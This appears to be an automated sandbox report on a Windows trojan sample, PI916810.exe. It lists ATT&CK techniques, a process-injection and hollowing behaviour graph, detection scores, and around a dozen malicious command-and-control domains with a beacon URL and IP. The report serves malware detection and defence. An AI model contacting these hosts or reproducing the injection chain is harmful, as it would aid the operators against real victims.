          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		1
          Credential API Hooking          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Shared Modules          		2
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		21
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
          Valid Accounts          		2
          Obfuscated Files or Information          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin Shares21
          Input Capture          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation          		1
          DLL Side-Loading          		NTDS215
          System Information Discovery          		Distributed Component Object Model3
          Clipboard Data          		12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
          Process Injection          		1
          Rootkit          		LSA Secrets251
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Valid Accounts          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Virtualization/Sandbox Evasion          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
          Access Token Manipulation          		Proc Filesystem11
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt612
          Process Injection          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1548156 Sample: PI916810.exe Startdate: 04/11/2024 Architecture: WINDOWS Score: 100 30 www.ool-covers76.xyz 2->30 32 www.lray-civil.xyz 2->32 34 10 other IPs or domains 2->34 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 46 8 other signatures 2->46 11 PI916810.exe 4 2->11         started        signatures3 44 Performs DNS queries to domains with low reputation 32->44 process4 signatures5 56 Binary is likely a compiled AutoIt script file 11->56 58 Writes to foreign memory regions 11->58 60 Maps a DLL or memory area into another process 11->60 62 Switches to a custom stack to bypass stack traces 11->62 14 svchost.exe 11->14         started        process6 signatures7 64 Modifies the context of a thread in another process (thread injection) 14->64 66 Maps a DLL or memory area into another process 14->66 68 Sample uses process hollowing technique 14->68 70 3 other signatures 14->70 17 explorer.exe 83 1 14->17 injected process8 dnsIp9 28 94950.bodis.com 199.59.243.227, 49796, 80 BODIS-NJUS United States 17->28 36 System process connects to network (likely due to code injection or exploit) 17->36 21 WWAHost.exe 17->21         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 54 Switches to a custom stack to bypass stack traces 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PI916810.exe29%ReversingLabsWin32.Trojan.AutoitInject
          PI916810.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://powerpoint.office.comcember0%URL Reputationsafe
          https://excel.office.com0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
          https://outlook.com0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          https://api.msn.com/0%URL Reputationsafe
          http://crl.v0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          94950.bodis.com
          		199.59.243.227
          		truetrue
            		unknown
            www.elonix-traceglow.pro
            		unknown
            		unknowntrue
              		unknown
              www.ithin-ksvodn.xyz
              		unknown
              		unknowntrue
                		unknown
                www.lray-civil.xyz
                		unknown
                		unknowntrue
                  		unknown
                  www.azl.pro
                  		unknown
                  		unknowntrue
                    		unknown
                    www.g18q11a.top
                    		unknown
                    		unknowntrue
                      		unknown
                      www.9net88.net
                      		unknown
                      		unknowntrue
                        		unknown
                        www.eloshost.xyz
                        		unknown
                        		unknowntrue
                          		unknown
                          www.lasterdeals.shop
                          		unknown
                          		unknowntrue
                            		unknown
                            www.ool-covers76.xyz
                            		unknown
                            		unknowntrue
                              		unknown
                              www.ridesmaidgiftsboutiqueki.shop
                              		unknown
                              		unknowntrue
                                		unknown
                                www.rowadservepros.net
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  www.9net88.net/ge07/true
                                    		unknown
                                    http://www.9net88.net/ge07/?O2MHn=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22uvGPLor/dpE&uVuD=ApWHHFtrue
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://word.office.comonexplorer.exe, 00000003.00000000.2048880486.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://www.azl.proexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.ool-covers76.xyz/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://www.eloshost.xyzReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://www.ood-packaging-jobs-brasil.today/ge07/www.zoc-marriage.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://www.g18q11a.topReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.lasterdeals.shopReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://www.9net88.netReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://www.wner-nyquh.xyz/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://powerpoint.office.comcemberexplorer.exe, 00000003.00000000.2051663367.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4496560634.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.eloshost.xyz/ge07/www.lray-civil.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://www.lasterdeals.shop/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://excel.office.comexplorer.exe, 00000003.00000002.4494090893.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095216810.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2422259396.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094383643.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.elonix-traceglow.pro/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.zoc-marriage.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://schemas.microexplorer.exe, 00000003.00000000.2048246007.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2048278043.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2047748419.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.lasterdeals.shop/ge07/www.eloshost.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://www.giyztm.xyz/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://www.9net88.net/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://www.ool-covers76.xyzReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://www.rowadservepros.net/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://www.azl.proReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.9net88.net/ge07/www.lasterdeals.shopexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://www.eloshost.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://www.giyztm.xyzReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://www.rowadservepros.netexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://www.ridesmaidgiftsboutiqueki.shopReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.yegle.net/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000003.00000000.2051663367.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4496560634.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://www.giyztm.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://www.ridesmaidgiftsboutiqueki.shopexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://www.elonix-traceglow.proReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://www.ithin-ksvodn.xyz/ge07/www.g18q11a.topexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://www.elonix-traceglow.proexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://www.lray-civil.xyz/ge07/www.ool-covers76.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://www.ool-covers76.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://wns.windows.com/)sexplorer.exe, 00000003.00000000.2048880486.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://www.lray-civil.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.2052141439.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2052141439.000000000C860000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.ridesmaidgiftsboutiqueki.shop/ge07/www.elonix-traceglow.proexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.g18q11a.topexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.ool-covers76.xyz/ge07/www.azl.proexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://www.giyztm.xyz/ge07/www.ridesmaidgiftsboutiqueki.shopexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://www.elonix-traceglow.pro/ge07/www.yegle.netexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://www.eloshost.xyz/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://www.wner-nyquh.xyzReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.lray-civil.xyzReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://www.wner-nyquh.xyz/ge07/www.ood-packaging-jobs-brasil.todayexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://www.azl.pro/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://www.lray-civil.xyz/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://outlook.comexplorer.exe, 00000003.00000003.3094383643.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2422259396.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4494158240.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.ood-packaging-jobs-brasil.todayReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://www.g18q11a.top/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://www.ithin-ksvodn.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://www.lasterdeals.shopexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://www.ridesmaidgiftsboutiqueki.shop/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://www.rowadservepros.net/ge07/www.giyztm.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://www.ithin-ksvodn.xyzReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.9net88.netexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://www.rowadservepros.netReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.wner-nyquh.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.ood-packaging-jobs-brasil.todayexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.ithin-ksvodn.xyz/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.4489526036.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2046728721.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.azl.pro/ge07/www.ithin-ksvodn.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.g18q11a.top/ge07/www.rowadservepros.netexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.zoc-marriage.xyzReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.yegle.netexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.ood-packaging-jobs-brasil.today/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://api.msn.com/explorer.exe, 00000003.00000002.4492745414.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://www.yegle.net/ge07/www.wner-nyquh.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://crl.vexplorer.exe, 00000003.00000002.4486573997.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2044763297.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://www.yegle.netReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://www.zoc-marriage.xyz/ge07/explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown

                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                          Public IPs

                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          199.59.243.227
                                                                                                                                                                          		94950.bodis.comUnited States
                                                                                                                                                                          		395082BODIS-NJUStrue

                                                                                                                                                                          General Information

                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                          Analysis ID:1548156
                                                                                                                                                                          Start date and time:2024-11-04 03:13:10 +01:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 10m 5s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Sample name:PI916810.exe
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal100.troj.evad.winEXE@301/5@12/1
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 100%
